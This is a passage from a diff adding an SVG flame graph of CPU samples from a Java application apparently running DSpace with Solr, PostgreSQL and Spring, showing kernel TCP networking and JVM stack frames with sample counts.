+<title>ret_from_intr (1 samples, 0.09%)</title><rect x="132.5" y="1125" width="1.1" height="15.0" fill="rgb(238,106,106)" rx="2" ry="2" />
+<text  x="135.51" y="1135.5" ></text>
+</g>
+<g >
+<title>ip_local_out (133 samples, 12.11%)</title><rect x="202.4" y="1077" width="142.9" height="15.0" fill="rgb(234,100,100)" rx="2" ry="2" />
+<text  x="205.37" y="1087.5" >ip_local_out</text>
+</g>
+<g >
+<title>__perf_event_task_sched_in (60 samples, 5.46%)</title><rect x="13.2" y="1141" width="64.5" height="15.0" fill="rgb(233,99,99)" rx="2" ry="2" />
+<text  x="16.22" y="1151.5" >__perf_..</text>
+</g>
+<g >
+<title>tcp_small_queue_check.isra.0 (1 samples, 0.09%)</title><rect x="191.6" y="1141" width="1.1" height="15.0" fill="rgb(240,108,108)" rx="2" ry="2" />
+<text  x="194.62" y="1151.5" ></text>
+</g>
+<g >
+<title>org/apache/http/impl/io/AbstractSessionOutputBuffer:::write (2 samples, 0.18%)</title><rect x="537.7" y="805" width="2.1" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="540.67" y="815.5" ></text>
+</g>
+<g >
+<title>all (1,098 samples, 100%)</title><rect x="10.0" y="1349" width="1180.0" height="15.0" fill="rgb(255,130,130)" rx="2" ry="2" />
+<text  x="13.00" y="1359.5" ></text>
+</g>
+<g >
+<title>do_syscall_64 (53 samples, 4.83%)</title><rect x="85.2" y="1285" width="57.0" height="15.0" fill="rgb(245,115,115)" rx="2" ry="2" />
+<text  x="88.23" y="1295.5" >do_sys..</text>
+</g>
+<g >
+<title>java/util/regex/Pattern:::closure (2 samples, 0.18%)</title><rect x="929.9" y="757" width="2.2" height="15.0" fill="rgb(77,224,77)" rx="2" ry="2" />
+<text  x="932.93" y="767.5" ></text>
+</g>
+<g >
+<title>Java_java_net_SocketInputStream_socketRead0 (12 samples, 1.09%)</title><rect x="540.9" y="837" width="12.9" height="15.0" fill="rgb(228,91,91)" rx="2" ry="2" />
+<text  x="543.89" y="847.5" ></text>
+</g>
+<g >
+<title>try_to_wake_up (1 samples, 0.09%)</title><rect x="964.3" y="725" width="1.1" height="15.0" fill="rgb(237,105,105)" rx="2" ry="2" />
+<text  x="967.32" y="735.5" ></text>
+</g>
+<g >
+<title>java/lang/Throwable:::fillInStackTrace (7 samples, 0.64%)</title><rect x="1101.9" y="741" width="7.5" height="15.0" fill="rgb(77,224,77)" rx="2" ry="2" />
+<text  x="1104.88" y="751.5" ></text>
+</g>
+<g >
+<title>org/apache/commons/dbcp/DelegatingPreparedStatement:::executeQuery (7 samples, 0.64%)</title><rect x="853.6" y="869" width="7.5" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="856.62" y="879.5" ></text>
+</g>
+<g >
+<title>sun/nio/cs/UTF_8$Decoder:::decode (1 samples, 0.09%)</title><rect x="776.2" y="901" width="1.1" height="15.0" fill="rgb(88,235,88)" rx="2" ry="2" />
+<text  x="779.25" y="911.5" ></text>
+</g>
+<g >
+<title>JVM_FillInStackTrace (3 samples, 0.27%)</title><rect x="543.0" y="661" width="3.3" height="15.0" fill="rgb(232,97,97)" rx="2" ry="2" />
+<text  x="546.04" y="671.5" ></text>
+</g>
+<g >
+<title>[libjvm.so] (1 samples, 0.09%)</title><rect x="744.0" y="869" width="1.1" height="15.0" fill="rgb(235,101,101)" rx="2" ry="2" />
+<text  x="747.01" y="879.5" ></text>
+</g>
+<g >
+<title>nft_immediate_eval (1 samples, 0.09%)</title><rect x="324.9" y="805" width="1.1" height="15.0" fill="rgb(245,115,115)" rx="2" ry="2" />
+<text  x="327.88" y="815.5" ></text>
+</g>
+<g >
+<title>org/apache/solr/client/solrj/request/AbstractUpdateRequest:::process (88 samples, 8.01%)</title><rect x="465.7" y="949" width="94.5" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="468.66" y="959.5" >org/apache/..</text>
+</g>
+<g >
+<title>org/postgresql/jdbc2/AbstractJdbc2Statement:::executeWithFlags (2 samples, 0.18%)</title><rect x="1151.3" y="869" width="2.2" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="1154.31" y="879.5" ></text>
+</g>
+<g >
+<title>org/postgresql/core/v3/QueryExecutorImpl:::execute (2 samples, 0.18%)</title><rect x="1151.3" y="853" width="2.2" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="1154.31" y="863.5" ></text>
+</g>
+<g >
+<title>ext4_data_block_valid_rcu.isra.0 (1 samples, 0.09%)</title><rect x="11.1" y="1029" width="1.0" height="15.0" fill="rgb(234,100,100)" rx="2" ry="2" />
+<text  x="14.07" y="1039.5" ></text>
+</g>
+<g >
+<title>org/dspace/storage/rdbms/TableRow:::getIntColumn (3 samples, 0.27%)</title><rect x="793.4" y="933" width="3.3" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="796.44" y="943.5" ></text>
+</g>
+<g >
+<title>org/apache/http/impl/conn/PoolingClientConnectionManager:::releaseConnection (1 samples, 0.09%)</title><rect x="559.2" y="917" width="1.0" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="562.16" y="927.5" ></text>
+</g>
+<g >
+<title>java/util/ArrayList$SubList$1:::hasNext (1 samples, 0.09%)</title><rect x="580.7" y="949" width="1.0" height="15.0" fill="rgb(77,224,77)" rx="2" ry="2" />
+<text  x="583.66" y="959.5" ></text>
+</g>
+<g >
+<title>edu/sdsc/grid/io/FileFactory:::newFileInputStream (1 samples, 0.09%)</title><rect x="408.7" y="917" width="1.1" height="15.0" fill="rgb(219,219,66)" rx="2" ry="2" />
+<text  x="411.71" y="927.5" ></text>
+</g>
+<g >
+<title>tcp_update_skb_after_send (1 samples, 0.09%)</title><rect x="349.6" y="1109" width="1.1" height="15.0" fill="rgb(240,108,108)" rx="2" ry="2" />
+<text  x="352.60" y="1119.5" ></text>
+</g>
+<g >
+<title>org/springframework/core/convert/support/GenericConversionService$ConverterAdapter:::getConvertibleTypes (2 samples, 0.18%)</title><rect x="680.6" y="885" width="2.2" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="683.60" y="895.5" ></text>
+</g>
+<g >
+<title>tcp_sendmsg (185 samples, 16.85%)</title><rect x="163.7" y="1205" width="198.8" height="15.0" fill="rgb(240,108,108)" rx="2" ry="2" />
+<text  x="166.68" y="1215.5" >tcp_sendmsg</text>
+</g>
+<g >
+<title>org/dspace/browse/BrowseIndex:::&lt;init&gt; (24 samples, 2.19%)</title><rect x="907.4" y="837" width="25.8" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="910.36" y="847.5" >o..</text>
+</g>
+<g >
+<title>jshort_disjoint_arraycopy (1 samples, 0.09%)</title><rect x="932.1" y="821" width="1.1" height="15.0" fill="rgb(231,95,95)" rx="2" ry="2" />
+<text  x="935.08" y="831.5" ></text>
+</g>
+<g >
+<title>tcp_send_ack (1 samples, 0.09%)</title><rect x="249.7" y="725" width="1.0" height="15.0" fill="rgb(240,108,108)" rx="2" ry="2" />
+<text  x="252.65" y="735.5" ></text>
+</g>
+<g >
+<title>java/util/GregorianCalendar:::computeTime (1 samples, 0.09%)</title><rect x="1042.8" y="933" width="1.0" height="15.0" fill="rgb(77,224,77)" rx="2" ry="2" />
+<text  x="1045.77" y="943.5" ></text>
+</g>
+<g >
+<title>[libjvm.so] (1 samples, 0.09%)</title><rect x="462.4" y="757" width="1.1" height="15.0" fill="rgb(235,101,101)" rx="2" ry="2" />
+<text  x="465.44" y="767.5" ></text>
+</g>
+<g >
+<title>__kmalloc_reserve.isra.0 (5 samples, 0.46%)</title><rect x="175.5" y="1141" width="5.4" height="15.0" fill="rgb(228,91,91)" rx="2" ry="2" />
+<text  x="178.50" y="1151.5" ></text>
+</g>
+<g >
+<title>org/apache/http/impl/client/AbstractHttpClient:::doExecute (26 samples, 2.37%)</title><rect x="531.2" y="917" width="28.0" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="534.22" y="927.5" >o..</text>
+</g>
+<g >
+<title>pick_next_task_fair (1 samples, 0.09%)</title><rect x="366.8" y="1221" width="1.1" height="15.0" fill="rgb(241,110,110)" rx="2" ry="2" />
+<text  x="369.79" y="1231.5" ></text>
+</g>
+<g >
+<title>[libjvm.so] (3 samples, 0.27%)</title><rect x="543.0" y="773" width="3.3" height="15.0" fill="rgb(235,101,101)" rx="2" ry="2" />
+<text  x="546.04" y="783.5" ></text>
+</g>
+<g >
+<title>dec_pending (1 samples, 0.09%)</title><rect x="137.9" y="933" width="1.1" height="15.0" fill="rgb(250,123,123)" rx="2" ry="2" />
+<text  x="140.89" y="943.5" ></text>
+</g>
+<g >
+<title>java/util/HashMap:::resize (1 samples, 0.09%)</title><rect x="609.7" y="949" width="1.0" height="15.0" fill="rgb(77,224,77)" rx="2" ry="2" />
+<text  x="612.67" y="959.5" ></text>
+</g>
+<g >
+<title>acpi_hw_read_port (1 samples, 0.09%)</title><rect x="132.5" y="949" width="1.1" height="15.0" fill="rgb(238,106,106)" rx="2" ry="2" />
+<text  x="135.51" y="959.5" ></text>
+</g>
+<g >
+<title>ext4_file_write_iter (1 samples, 0.09%)</title><rect x="1139.5" y="741" width="1.1" height="15.0" fill="rgb(234,100,100)" rx="2" ry="2" />
+<text  x="1142.49" y="751.5" ></text>
+</g>
+<g >
+<title>Interpreter (1 samples, 0.09%)</title><rect x="559.2" y="869" width="1.0" height="15.0" fill="rgb(243,112,112)" rx="2" ry="2" />
+<text  x="562.16" y="879.5" ></text>
+</g>
+<g >
+<title>org/postgresql/jdbc2/AbstractJdbc2Statement:::executeWithFlags (2 samples, 0.18%)</title><rect x="749.4" y="869" width="2.1" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="752.38" y="879.5" ></text>
+</g>
+<g >
+<title>ip_rcv_core.isra.0 (1 samples, 0.09%)</title><rect x="235.7" y="853" width="1.1" height="15.0" fill="rgb(234,100,100)" rx="2" ry="2" />
+<text  x="238.68" y="863.5" ></text>
+</g>
+<g >
+<title>arrayof_jint_fill (1 samples, 0.09%)</title><rect x="905.2" y="837" width="1.1" height="15.0" fill="rgb(232,96,96)" rx="2" ry="2" />
+<text  x="908.21" y="847.5" ></text>
+</g>
+<g >
+<title>java/util/HashMap:::resize (1 samples, 0.09%)</title><rect x="616.1" y="933" width="1.1" height="15.0" fill="rgb(77,224,77)" rx="2" ry="2" />
+<text  x="619.12" y="943.5" ></text>
+</g>
+<g >
+<title>poll_schedule_timeout.constprop.0 (3 samples, 0.27%)</title><rect x="1109.4" y="789" width="3.2" height="15.0" fill="rgb(249,122,122)" rx="2" ry="2" />
+<text  x="1112.40" y="799.5" ></text>
+</g>
+<g >
+<title>put_prev_entity (1 samples, 0.09%)</title><rect x="366.8" y="1205" width="1.1" height="15.0" fill="rgb(236,103,103)" rx="2" ry="2" />
+<text  x="369.79" y="1215.5" ></text>
+</g>
+<g >
+<title>start_thread (761 samples, 69.31%)</title><rect x="372.2" y="1317" width="817.8" height="15.0" fill="rgb(237,104,104)" rx="2" ry="2" />
+<text  x="375.17" y="1327.5" >start_thread</text>
+</g>
+<g >
+<title>org/dspace/storage/rdbms/DatabaseManager:::process (1 samples, 0.09%)</title><rect x="828.9" y="949" width="1.1" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="831.91" y="959.5" ></text>
+</g>
+<g >
+<title>__x64_sys_recvfrom (47 samples, 4.28%)</title><rect x="87.4" y="1269" width="50.5" height="15.0" fill="rgb(236,103,103)" rx="2" ry="2" />
+<text  x="90.38" y="1279.5" >__x64..</text>
+</g>
+<g >
+<title>__sched_text_start (61 samples, 5.56%)</title><rect x="13.2" y="1173" width="65.6" height="15.0" fill="rgb(231,95,95)" rx="2" ry="2" />
+<text  x="16.22" y="1183.5" >__sched..</text>
+</g>
+<g >
+<title>org/postgresql/core/v3/QueryExecutorImpl:::sendOneQuery (1 samples, 0.09%)</title><rect x="1027.7" y="837" width="1.1" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="1030.72" y="847.5" ></text>
+</g>
+<g >
+<title>org/apache/log4j/DefaultThrowableRenderer:::render (7 samples, 0.64%)</title><rect x="413.0" y="837" width="7.5" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="416.01" y="847.5" ></text>
+</g>
+<g >
+<title>org/postgresql/core/v3/QueryExecutorImpl:::sendOneQuery (2 samples, 0.18%)</title><rect x="749.4" y="837" width="2.1" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="752.38" y="847.5" ></text>
+</g>
+<g >
+<title>hrtimer_interrupt (1 samples, 0.09%)</title><rect x="709.6" y="821" width="1.1" height="15.0" fill="rgb(236,102,102)" rx="2" ry="2" />
+<text  x="712.62" y="831.5" ></text>
+</g>
+<g >
+<title>__x64_sys_connect (1 samples, 0.09%)</title><rect x="1078.2" y="709" width="1.1" height="15.0" fill="rgb(236,103,103)" rx="2" ry="2" />
+<text  x="1081.23" y="719.5" ></text>
+</g>
+<g >
+<title>org/apache/commons/dbcp/DelegatingStatement:::close (1 samples, 0.09%)</title><rect x="745.1" y="901" width="1.1" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="748.08" y="911.5" ></text>
+</g>
+<g >
+<title>org/springframework/beans/BeanWrapperImpl:::getWrappedClass (1 samples, 0.09%)</title><rect x="897.7" y="885" width="1.1" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="900.69" y="895.5" ></text>
+</g>
+<g >
+<title>org/apache/http/entity/InputStreamEntity:::writeTo (3 samples, 0.27%)</title><rect x="536.6" y="837" width="3.2" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="539.59" y="847.5" ></text>
+</g>
+<g >
+<title>org/dspace/storage/rdbms/DatabaseManager:::findByUnique (1 samples, 0.09%)</title><rect x="755.8" y="917" width="1.1" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="758.83" y="927.5" ></text>
+</g>
+<g >
+<title>loopback_xmit (1 samples, 0.09%)</title><rect x="341.0" y="965" width="1.1" height="15.0" fill="rgb(236,102,102)" rx="2" ry="2" />
+<text  x="344.00" y="975.5" ></text>
+</g>
+<g >
+<title>org/apache/http/impl/client/DefaultRequestDirector:::tryConnect (1 samples, 0.09%)</title><rect x="1078.2" y="933" width="1.1" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="1081.23" y="943.5" ></text>
+</g>
+<g >
+<title>org/apache/commons/dbcp/DelegatingPreparedStatement:::clearParameters (1 samples, 0.09%)</title><rect x="869.7" y="901" width="1.1" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="872.74" y="911.5" ></text>
+</g>
+<g >
+<title>org/apache/log4j/helpers/ISO8601DateFormat:::format (1 samples, 0.09%)</title><rect x="1140.6" y="901" width="1.0" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="1143.56" y="911.5" ></text>
+</g>
+<g >
+<title>__sched_text_start (1 samples, 0.09%)</title><rect x="137.9" y="1237" width="1.1" height="15.0" fill="rgb(231,95,95)" rx="2" ry="2" />
+<text  x="140.89" y="1247.5" ></text>
+</g>
+<g >
+<title>java/lang/Integer:::toString (1 samples, 0.09%)</title><rect x="1029.9" y="869" width="1.0" height="15.0" fill="rgb(77,224,77)" rx="2" ry="2" />
+<text  x="1032.87" y="879.5" ></text>
+</g>
+<g >
+<title>vtable stub (1 samples, 0.09%)</title><rect x="633.3" y="869" width="1.1" height="15.0" fill="rgb(231,96,96)" rx="2" ry="2" />
+<text  x="636.32" y="879.5" ></text>
+</g>
+<g >
+<title>org/dspace/content/Bundle:::getName (10 samples, 0.91%)</title><rect x="730.0" y="965" width="10.8" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="733.04" y="975.5" ></text>
+</g>
+<g >
+<title>ExceptionBlob (1 samples, 0.09%)</title><rect x="531.2" y="901" width="1.1" height="15.0" fill="rgb(223,84,84)" rx="2" ry="2" />
+<text  x="534.22" y="911.5" ></text>
+</g>
+<g >
+<title>__x64_sys_openat (1 samples, 0.09%)</title><rect x="11.1" y="1253" width="1.0" height="15.0" fill="rgb(236,103,103)" rx="2" ry="2" />
+<text  x="14.07" y="1263.5" ></text>
+</g>
+<g >
+<title>update_rq_clock (1 samples, 0.09%)</title><rect x="273.3" y="629" width="1.1" height="15.0" fill="rgb(236,102,102)" rx="2" ry="2" />
+<text  x="276.30" y="639.5" ></text>
+</g>
+<g >
+<title>tcp_v4_rcv (47 samples, 4.28%)</title><rect x="241.1" y="789" width="50.5" height="15.0" fill="rgb(240,108,108)" rx="2" ry="2" />
+<text  x="244.06" y="799.5" >tcp_v..</text>
+</g>
+<g >
+<title>org/apache/commons/dbcp/DelegatingPreparedStatement:::executeQuery (2 samples, 0.18%)</title><rect x="749.4" y="933" width="2.1" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="752.38" y="943.5" ></text>
+</g>
+<g >
+<title>java/net/SocketInputStream:::socketRead0 (1 samples, 0.09%)</title><rect x="735.4" y="773" width="1.1" height="15.0" fill="rgb(77,224,77)" rx="2" ry="2" />
+<text  x="738.41" y="783.5" ></text>
+</g>
+<g >
+<title>java/nio/charset/CharsetEncoder:::encode (1 samples, 0.09%)</title><rect x="886.9" y="789" width="1.1" height="15.0" fill="rgb(77,224,77)" rx="2" ry="2" />
+<text  x="889.94" y="799.5" ></text>
+</g>
+<g >
+<title>java/util/regex/Pattern$Ques:::study (2 samples, 0.18%)</title><rect x="921.3" y="709" width="2.2" height="15.0" fill="rgb(77,224,77)" rx="2" ry="2" />
+<text  x="924.33" y="719.5" ></text>
+</g>
+<g >
+<title>org/apache/commons/dbcp/DelegatingResultSet:::getInt (1 samples, 0.09%)</title><rect x="876.2" y="917" width="1.1" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="879.19" y="927.5" ></text>
+</g>
+<g >
+<title>org/springframework/beans/factory/support/AbstractAutowireCapableBeanFactory:::predictBeanType (13 samples, 1.18%)</title><rect x="994.4" y="885" width="14.0" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="997.41" y="895.5" ></text>
+</g>
+<g >
+<title>org/postgresql/core/v3/SimpleParameterList:::getV3Length (1 samples, 0.09%)</title><rect x="867.6" y="805" width="1.1" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="870.60" y="815.5" ></text>
+</g>
+<g >
+<title>org/postgresql/core/PGStream:::Receive (1 samples, 0.09%)</title><rect x="873.0" y="773" width="1.0" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="875.97" y="783.5" ></text>
+</g>
+<g >
+<title>sun/nio/cs/UTF_8$Encoder:::encode (5 samples, 0.46%)</title><rect x="525.8" y="885" width="5.4" height="15.0" fill="rgb(88,235,88)" rx="2" ry="2" />
+<text  x="528.85" y="895.5" ></text>
+</g>
+<g >
+<title>acpi_ev_sci_xrupt_handler (1 samples, 0.09%)</title><rect x="132.5" y="1013" width="1.1" height="15.0" fill="rgb(238,106,106)" rx="2" ry="2" />
+<text  x="135.51" y="1023.5" ></text>
+</g>
+<g >
+<title>_register_finalizer_Java (1 samples, 0.09%)</title><rect x="755.8" y="885" width="1.1" height="15.0" fill="rgb(236,103,103)" rx="2" ry="2" />
+<text  x="758.83" y="895.5" ></text>
+</g>
+<g >
+<title>handle_irq_event (1 samples, 0.09%)</title><rect x="137.9" y="1157" width="1.1" height="15.0" fill="rgb(234,100,100)" rx="2" ry="2" />
+<text  x="140.89" y="1167.5" ></text>
+</g>
+<g >
+<title>org/postgresql/core/v3/QueryExecutorImpl:::processResults (1 samples, 0.09%)</title><rect x="1151.3" y="837" width="1.1" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="1154.31" y="847.5" ></text>
+</g>
+<g >
+<title>jshort_arraycopy (1 samples, 0.09%)</title><rect x="388.3" y="917" width="1.1" height="15.0" fill="rgb(231,95,95)" rx="2" ry="2" />
+<text  x="391.29" y="927.5" ></text>
+</g>
+<g >
+<title>tcp_push (154 samples, 14.03%)</title><rect x="191.6" y="1173" width="165.5" height="15.0" fill="rgb(240,108,108)" rx="2" ry="2" />
+<text  x="194.62" y="1183.5" >tcp_push</text>
+</g>
+<g >
+<title>Interpreter (1 samples, 0.09%)</title><rect x="1122.3" y="885" width="1.1" height="15.0" fill="rgb(243,112,112)" rx="2" ry="2" />
+<text  x="1125.30" y="895.5" ></text>
+</g>
+<g >
+<title>[libjvm.so] (1 samples, 0.09%)</title><rect x="462.4" y="773" width="1.1" height="15.0" fill="rgb(235,101,101)" rx="2" ry="2" />
+<text  x="465.44" y="783.5" ></text>
+</g>
+<g >
+<title>java/util/Collections$SynchronizedCollection:::add (1 samples, 0.09%)</title><rect x="894.5" y="901" width="1.0" height="15.0" fill="rgb(77,224,77)" rx="2" ry="2" />
+<text  x="897.46" y="911.5" ></text>
+</g>
+<g >
+<title>org/apache/commons/dbcp/DelegatingStatement:::close (1 samples, 0.09%)</title><rect x="850.4" y="885" width="1.1" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="853.40" y="895.5" ></text>
+</g>
+<g >
+<title>[libjvm.so] (3 samples, 0.27%)</title><rect x="543.0" y="757" width="3.3" height="15.0" fill="rgb(235,101,101)" rx="2" ry="2" />
+<text  x="546.04" y="767.5" ></text>
+</g>
+<g >
+<title>org/dspace/discovery/configuration/DiscoverySearchFilter:::getMetadataFields (1 samples, 0.09%)</title><rect x="1128.7" y="981" width="1.1" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="1131.74" y="991.5" ></text>
+</g>
+<g >
+<title>org/postgresql/jdbc2/AbstractJdbc2Statement:::executeWithFlags (1 samples, 0.09%)</title><rect x="838.6" y="869" width="1.1" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="841.58" y="879.5" ></text>
+</g>
+<g >
+<title>[libjvm.so] (1 samples, 0.09%)</title><rect x="1090.1" y="885" width="1.0" height="15.0" fill="rgb(235,101,101)" rx="2" ry="2" />
+<text  x="1093.05" y="895.5" ></text>
+</g>
+<g >
+<title>java/lang/String:::getBytes (7 samples, 0.64%)</title><rect x="523.7" y="901" width="7.5" height="15.0" fill="rgb(77,224,77)" rx="2" ry="2" />
+<text  x="526.70" y="911.5" ></text>
+</g>
+<g >
+<title>org/postgresql/core/v3/QueryExecutorImpl:::execute (5 samples, 0.46%)</title><rect x="785.9" y="837" width="5.4" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="788.92" y="847.5" ></text>
+</g>
+<g >
+<title>Interpreter (747 samples, 68.03%)</title><rect x="372.2" y="1221" width="802.8" height="15.0" fill="rgb(243,112,112)" rx="2" ry="2" />
+<text  x="375.17" y="1231.5" >Interpreter</text>
+</g>
+<g >
+<title>org/springframework/beans/PropertyEditorRegistrySupport:::createDefaultEditors (94 samples, 8.56%)</title><rect x="621.5" y="917" width="101.0" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="624.49" y="927.5" >org/springfr..</text>
+</g>
+<g >
+<title>org/postgresql/core/v3/QueryExecutorImpl:::execute (5 samples, 0.46%)</title><rect x="1023.4" y="853" width="5.4" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="1026.42" y="863.5" ></text>
+</g>
+<g >
+<title>__GI___libc_write (2 samples, 0.18%)</title><rect x="1138.4" y="869" width="2.2" height="15.0" fill="rgb(228,91,91)" rx="2" ry="2" />
+<text  x="1141.42" y="879.5" ></text>
+</g>
+<g >
+<title>org/apache/commons/logging/impl/SLF4JLogFactory:::getInstance (2 samples, 0.18%)</title><rect x="664.5" y="885" width="2.1" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="667.48" y="895.5" ></text>
+</g>
+<g >
+<title>[libjvm.so] (1 samples, 0.09%)</title><rect x="758.0" y="901" width="1.1" height="15.0" fill="rgb(235,101,101)" rx="2" ry="2" />
+<text  x="760.98" y="911.5" ></text>
+</g>
+<g >
+<title>vtable stub (1 samples, 0.09%)</title><rect x="923.5" y="757" width="1.1" height="15.0" fill="rgb(231,96,96)" rx="2" ry="2" />
+<text  x="926.48" y="767.5" ></text>
+</g>
+<g >
+<title>__sys_shutdown (1 samples, 0.09%)</title><rect x="1121.2" y="805" width="1.1" height="15.0" fill="rgb(231,95,95)" rx="2" ry="2" />
+<text  x="1124.22" y="815.5" ></text>
+</g>
+<g >
+<title>process_backlog (1 samples, 0.09%)</title><rect x="1078.2" y="389" width="1.1" height="15.0" fill="rgb(244,114,114)" rx="2" ry="2" />
+<text  x="1081.23" y="399.5" ></text>
+</g>
+<g >
+<title>org/apache/http/impl/client/RequestWrapper:::resetHeaders (1 samples, 0.09%)</title><rect x="1118.0" y="949" width="1.1" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="1121.00" y="959.5" ></text>
+</g>
+<g >
+<title>flexible_sched_in (1 samples, 0.09%)</title><rect x="1111.5" y="629" width="1.1" height="15.0" fill="rgb(236,103,103)" rx="2" ry="2" />
+<text  x="1114.55" y="639.5" ></text>
+</g>
+<g >
+<title>org/apache/commons/dbcp/DelegatingResultSet:::getMetaData (1 samples, 0.09%)</title><rect x="1164.2" y="981" width="1.1" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="1167.21" y="991.5" ></text>
+</g>
+<g >
+<title>org/springframework/core/env/MutablePropertySources:::addLast (17 samples, 1.55%)</title><rect x="704.2" y="885" width="18.3" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="707.24" y="895.5" ></text>
+</g>
+<g >
+<title>java/net/SocketInputStream:::socketRead0 (1 samples, 0.09%)</title><rect x="878.3" y="789" width="1.1" height="15.0" fill="rgb(77,224,77)" rx="2" ry="2" />
+<text  x="881.34" y="799.5" ></text>
+</g>
+<g >
+<title>__ksize (4 samples, 0.36%)</title><rect x="180.9" y="1141" width="4.3" height="15.0" fill="rgb(228,91,91)" rx="2" ry="2" />
+<text  x="183.87" y="1151.5" ></text>
+</g>
+<g >
+<title>ext4_da_write_end (1 samples, 0.09%)</title><rect x="1139.5" y="693" width="1.1" height="15.0" fill="rgb(234,100,100)" rx="2" ry="2" />
+<text  x="1142.49" y="703.5" ></text>
+</g>
+<g >
+<title>inet6_sendmsg (185 samples, 16.85%)</title><rect x="163.7" y="1221" width="198.8" height="15.0" fill="rgb(241,110,110)" rx="2" ry="2" />
+<text  x="166.68" y="1231.5" >inet6_sendmsg</text>
+</g>
+<g >
+<title>org/postgresql/jdbc2/AbstractJdbc2Statement:::executeQuery (1 samples, 0.09%)</title><rect x="827.8" y="869" width="1.1" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="830.83" y="879.5" ></text>
+</g>
+<g >
+<title>org/dspace/content/DSpaceObject:::getMetadata (10 samples, 0.91%)</title><rect x="730.0" y="949" width="10.8" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="733.04" y="959.5" ></text>
+</g>
+<g >
+<title>org/apache/commons/dbcp/DelegatingPreparedStatement:::executeQuery (3 samples, 0.27%)</title><rect x="832.1" y="901" width="3.3" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="835.13" y="911.5" ></text>
+</g>
+<g >
+<title>org/apache/commons/dbcp/DelegatingPreparedStatement:::executeQuery (2 samples, 0.18%)</title><rect x="1151.3" y="917" width="2.2" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="1154.31" y="927.5" ></text>
+</g>
+<g >
+<title>Interpreter (747 samples, 68.03%)</title><rect x="372.2" y="1045" width="802.8" height="15.0" fill="rgb(243,112,112)" rx="2" ry="2" />
+<text  x="375.17" y="1055.5" >Interpreter</text>
+</g>
+<g >
+<title>[libjvm.so] (1 samples, 0.09%)</title><rect x="826.8" y="869" width="1.0" height="15.0" fill="rgb(235,101,101)" rx="2" ry="2" />
+<text  x="829.76" y="879.5" ></text>
+</g>
+<g >
+<title>__softirqentry_text_start (1 samples, 0.09%)</title><rect x="220.6" y="933" width="1.1" height="15.0" fill="rgb(231,95,95)" rx="2" ry="2" />
+<text  x="223.64" y="943.5" ></text>
+</g>
+<g >
+<title>org/apache/commons/dbcp/DelegatingPreparedStatement:::executeQuery (2 samples, 0.18%)</title><rect x="760.1" y="933" width="2.2" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="763.13" y="943.5" ></text>
+</g>
+<g >
+<title>org/dspace/storage/rdbms/TableRow:::setColumn (5 samples, 0.46%)</title><rect x="778.4" y="917" width="5.4" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="781.40" y="927.5" ></text>
+</g>
+<g >
+<title>java/util/regex/Pattern$Curly:::study (1 samples, 0.09%)</title><rect x="921.3" y="693" width="1.1" height="15.0" fill="rgb(77,224,77)" rx="2" ry="2" />
+<text  x="924.33" y="703.5" ></text>
+</g>
+<g >
+<title>tcp_in_window (2 samples, 0.18%)</title><rect x="215.3" y="981" width="2.1" height="15.0" fill="rgb(240,108,108)" rx="2" ry="2" />
+<text  x="218.26" y="991.5" ></text>
+</g>
+<g >
+<title>org/postgresql/jdbc2/AbstractJdbc2Statement:::executeWithFlags (2 samples, 0.18%)</title><rect x="833.2" y="869" width="2.2" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="836.21" y="879.5" ></text>
+</g>
+<g >
